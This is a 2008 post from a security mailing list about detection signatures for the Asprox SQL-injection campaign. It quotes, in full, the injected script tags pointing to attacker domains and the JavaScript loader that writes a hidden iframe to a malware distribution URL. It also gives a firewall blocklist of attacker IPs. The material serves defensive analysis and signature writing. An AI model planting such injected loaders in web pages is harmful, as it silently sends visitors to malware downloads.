[Emerging-Sigs] some asprox rules

Thu Jul 10 12:40:55 EDT 2008

my bad. what about a sig which contains .mobi or .cn near a script tag?

> server:
>
> <script src=http://www.asp707.com/b.js></script><script
> src=http://www.rid34.com/b.js></script><script src
> =http://www.adbtch.com/ngg.js></script>
>
> And of the ones I found, none are on the main page or the home page.  They
> are always several layers deep, usually in a feedback form or in a
> "registered guest" sign up form.  If they were on the main page, it would
> get found by SK pen testers.  I don't think hackersafe or any of those types
> of products would find it, but even a junior pen tester *would* find it.  So
> it's buried down in the CMS somewhere.  Totally clever, because these web
> sites don't have any HTML on them.  They are brochure-ware that runs out of
> a stock CMS database that the owners know nothing about.
>
> If you go to one of those links, (which your ever-so-helpful browser does
> automatically) you get the iframe code:
>
> window.status="";
> n=navigator.userLanguage.toUpperCase();
> if((n!="ZH-CN")&&(n!="UR")&&(n!="RU")&&(n!="KO")&&(n!="ZH-TW")&&(n!="ZH")&&(n!="HI")&&(n!="TH")&&(n!="UR")&&(n!="VI")){
> var cookieString = document.cookie;
> var start = cookieString.indexOf("updngg=");
> if (start != -1){}else{
> var expires = new Date();
> expires.setTime(expires.getTime()+11*3600*1000);
> document.cookie = "updngg=update;expires="+expires.toGMTString();
> try{
> document.write("<iframe src=http://usabnr.com/cgi-bin/index.cgi?ad width=0
> height=0 frameborder=0></iframe>");
> }
> catch(e)
> {
> };
> }}
>
> Which send you to the actual malware distribution URL,
>      hxxp://usabnr.com/cgi-bin/index.cgi?ad
>
> Darn clever because its not easy to find a single point where you can cut it
> off.  I did a dig on all the identified asprox URLs and found that 130 URLs
> all pointed to a pool of only 38 IP addresses.  So I have been advising
> people to drop these 38 addresses at the firewall:
>
> 118.109.69.64
> 120.50.34.232
> 190.245.115.25
> 202.157.244.208
> 209.102.245.53
> 24.122.133.165
> 24.148.126.233
> 24.151.164.51
> 60.169.3.16
> 60.31.177.179
> 66.168.90.132
> 68.206.144.227
> 69.251.122.212
> 69.253.101.160
> 70.131.247.68
> 70.133.172.190
> 70.244.238.205
> 71.88.213.216
> 72.129.64.54
> 72.49.196.164
> 74.72.131.113
> 75.46.13.117
> 75.8.82.131
> 76.106.172.128
> 76.117.59.251
> 82.158.131.59
> 83.8.86.49
> 84.122.42.27
> 85.64.35.77
> 86.145.255.149
> 89.156.86.177
> 93.156.2.156
> 98.194.49.16
> 98.200.173.210
> 98.30.50.20
> 99.227.116.110
> 99.240.105.210
>
> A quick scan of the addresses shows "the usual suspects" we see all the
> time, over and over.
>
> jp
>
> --
>
> Framework?  I don't need no stinking framework!
>
> ----------------------------------------------------------------
> @fferent Security Labs:  Isolate/Insulate/Innovate
> http://www.afferentsecurity.com
>
>